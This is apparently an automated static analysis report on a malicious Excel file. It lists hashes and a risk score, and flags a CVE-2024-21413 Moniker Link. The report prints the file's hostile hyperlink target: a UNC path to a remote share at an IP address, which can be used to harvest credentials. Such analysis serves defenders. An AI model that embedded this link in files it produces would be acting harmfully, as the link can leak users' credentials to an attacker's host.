Malicious Office (OOXML) / .XLSX — malware analysis report

Static analysis result for SHA-256 d3bdac1a4d756ab5…

MALICIOUS

Office (OOXML) / .XLSX

Size: 5.7 KB
Created: 2023-10-04 20:11:27 UTC
Authoring application: Microsoft Excel 12.0000
First seen: 2023-10-13
MD5: ad318b5cf3252af10346f0a0b0390d8a
SHA-1: 1c9c0ac64966d360ce37ab8e0ed0597fc8cfd534
SHA-256: d3bdac1a4d756ab5efb9022451d86ff588c9b1e20208d129e126280d42484a34
Risk Score: 68

Malware Insights

MITRE ATT&CK
T1200 Hardware Additions; T1059 Command and Scripting Interpreter

The critical heuristic firing for CVE-2024-21413 indicates the file attempts to leverage a moniker link vulnerability. The presence of a UNC path in the document body strongly suggests an attempt to redirect the user to a remote network share, likely for further exploitation or credential harvesting. No scripts were extracted, and the document body content is minimal, but the vulnerability and UNC path are sufficient indicators.

Heuristics 2

  • CVE-2024-21413 — Moniker Link UNC path in OOXML (severity: critical; CVE likely; rule ID: CVE_2024_21413)
    The relationship target decodes to a file:///\\...! Moniker Link shape, which is associated with CVE-2024-21413.
  • External hyperlinks (1) (severity: low; rule ID: OOXML_EXTERNAL_HYPERLINKS)
    The document contains 1 external hyperlink; clickable URLs are stored as external relationships. First target: file:///\\167.235.149.241\share\[Workbookname.xlsx]SheetName'!$B$2:$C$62,2,FALSE)